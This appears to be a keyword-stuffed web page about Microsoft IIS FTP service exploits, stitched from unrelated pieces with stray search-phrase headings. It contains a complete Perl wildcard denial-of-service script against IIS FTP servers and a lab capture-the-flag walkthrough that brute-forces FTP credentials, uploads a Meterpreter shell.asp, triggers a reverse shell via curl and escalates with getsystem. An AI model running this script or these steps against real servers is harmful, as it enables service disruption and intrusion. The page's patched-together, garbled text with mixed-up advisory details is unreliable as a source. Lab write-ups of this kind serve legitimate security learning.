1. Microsoft Ftp Service Exploit Download
2. 220 Microsoft Ftp Service Vulnerability
3. 220 Microsoft Ftp Service Exploit Metasploit
4. Microsoft Ftp Service Windows 10
5. 220 Microsoft Ftp Service Exploit

220 Microsoft Ftp Service Exploit Metasploit The NTFS solution seems to be the way to go for users that cannot make a bigger change to their FTP services and has minimal impact, so it is a good interim solution until a real patch comes out. A vulnerability has been found in Microsoft IIS 7.5 (Web Server) and classified as critical. This vulnerability affects some unknown processing of the component FTP Server. The manipulation as part of a Telnet IAC Character leads to a denial of service vulnerability (Heap-based). As part of their recent cumulative patch (MS02-018), Microsoft reported that a remote user can exploit a flaw in the FTP component of Microsoft Internet Information Server (IIS) to cause both the FTP and the web service to crash.

Summary

‘An exploit code for Microsoft’s FTP Server vulnerability has been released. This exploit code can be used to test your system against the mentioned attack.’

Credit:

‘The information has been provided by Critical Watch Bugtraqqer.’

Details

‘Exploit:
#!/usr/bin/perl
# Author: Nelson Bunker – Critical Watch
# http://www.criticalwatch.com
#
# Simple Wildcard Denial of Service for IIS Ftp Servers – MS01-026
# Tested against several servers. Your mileage may vary.
#
# Assumes anonymous access.
#
# Thanks goes out to Lukasz Luzar [lluzar@developers.of.pl]
# For discovering and sharing this information
#
# May 15, 2001
####################_MAIN::Begin_#####################

use Net::FTP;

$wildcard=’***************************************** ****************************************************************’;

if (not $ARGV[0]) {

print qq~

Usage: wildcard_dos.pl <host>

~;

exit;}

$IPaddress= $ARGV[0];

$SIG {‘PIPE’} = FoundIt;

# create new FTP connection w/30 second timeout
$ftp = Net::FTP->new($IPaddress, Timeout => 5);

if(!$ftp){ die’$IPaddress is not responding to ftp connect attempt’;}

if(!$ftp->login(‘anonymous’,’tester@’)){ die’FTP user anonymous on $IPaddress is unacceptable’;}

$bogus = $ftp->ls($wildcard);

sub FoundIt
{
print ‘This machine ($IPaddress) is affectedn’;
exit(0);

}’

The Bobby CTF is based on a Windows XP Pro SP3 VM with the objective of retrieving the flag found somewhere within the administrator’s personal folder.

The VM can be downloaded from VulnHub and must be setup using VulnInjector, due to the licensing implications of providing a free Windows VM.

Service Fingerprinting

As the virtual machine comes pre-configured with a static IP address of 192.168.1.11, I skipped host discovery and began looking for and fingerprinting services instead.

I loaded up Metasploit [msfconsole] and began an Nmap scan with the sV flags to fingerprint the discovered services:

The results showed that the IIS 5.1 HTTP and FTP services were running.

Looking Further into IIS

With IIS 5.1 identified, I used Metasploit to check if WebDAV is enabled, which it wasn’t:

I then checked to see what Nikto could find:

The localstart.asp file which Nikto identified requires HTTP authentication in order to view and the change log doesn’t seem to exist.

Next, I ran dirb using the IIS vulnerability word list bundled with Kali:

Both directories that dirb found were not viewable, /iisadmin was seemingly restricted to local access from the server side, and /printers required HTTP authentication; possibly sharing the same credentials as /localstart.asp.

Bypassing HTTP Authentication

A quick search of the Metasploit IIS modules revealed that there is an auxiliary module (auxiliary/admin/http/iis_auth_bypass) which may help bypass the authentication on the URLs found using Nikto and dirb:

This module bypasses basic authentication for Internet InformationServices (IIS). By appending the NTFS stream name to the directoryname in a request, it is possible to bypass authentication.

The first path I tried this with was /printers, but it failed:

Nor did it work for /localstart.asp

After this module failed to bypass the authentication, I searched around and found CVE-2010-2731; a vulnerability which allows the bypassing of authentication by appending :$i30:$INDEX_ALLOCATION to the end of adirectory name in the GET request. I tried this with both /iisadmin and /printers, but both still prompted for authentication.

HTTP Brute Forcing

As exploiting vulnerabilities to bypass authentication wasn’t working, I used CeWL to create a custom word list based on the home page that was being served from IIS in an attempt to brute force the login.

Given it was the personal page of Bobby with a small bio, there were some keywords that could be picked up and mutated.

I then refactored the word list further to remove unlikely passwords and to include “thematrix” and merge “Daft” and “Punk” together:

Once the word list was ready, I used the auxiliary/scanner/http/http_login Metasploit module to attempt the brute force, but all attempts failed:

Getting FTP Access

All the attempts I had made on the HTTP server had failed, with no clear way to continue on that front, so I moved on to looking into the FTP server to see what was possible.

Searching Metasploit for Windows FTP exploits revealed MS09-053 - a buffer overflow which can lead to remote code execution:

This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP service. The flaw is triggered when a special NLST argument is passed while the session has changed into a long directory path. For this exploit to work, the FTP server must be configured to allow write access to the file system (either anonymously or in conjunction with a real account)

I suspected there’s not much chance that anonymous FTP access would be enabled, but decided to test for it anyway, just in case:

As my suspicions were correct, I next decided to try the word list I had previously generated with the FTP server, in case the FTP server and HTTP server weren’t using shared credentials for authentication:

No attempts were successful with the username “bobby”, so I proceeded to try again using the usernames “bob” and “robert”, but hit a lockout in the process due to too many incorrect attempts being made (“Unable to Connnect” locked out):

I waited for 5-10 minutes for the lockout to expire, and then resumed the brute force and managed to get a successful login with bob:Matrix:

Getting a Shell

Now that I had a valid set of credentials to login with, I decided to try the previously found buffer overflow exploit, but had no success in getting it to work:

Microsoft Ftp Service Exploit Download

As this exploit wasn’t working for me, I proceeded to generate a Meterpreter payload manually using msfvenom and uploaded it to the public folder:

Whilst checking that shell.asp had uploaded, I noticed there was also a file named hint.html, which I decided to take a look at (even if it was possibly a bit late):

220 Microsoft Ftp Service Vulnerability

I wasn’t (and I am still not) 100% sure what this hint was referring to, so I continued to setup the handler in Metasploit for the reverse shell:

220 Microsoft Ftp Service Exploit Metasploit

Once the TCP handler was setup and listening for connections, I proceeded to execute the shell script on the server by executing curl http://192.168.1.11/shell.asp and successfully got shell access:

Microsoft Ftp Service Windows 10

Getting System Privileges

Metasploit provides a very useful command (getsystem) in Meterpreter for Windows sessions, which will automate a variety of privilege escalation methods. My first instinct was to try using this command and on the first attempt, it successfully escalated to the SYSTEM user:

220 Microsoft Ftp Service Exploit

Now that I had access to the entire file system, I fished around in the administrator’s user folder a bit, found the flag on the desktop, and successfully completed the CTF!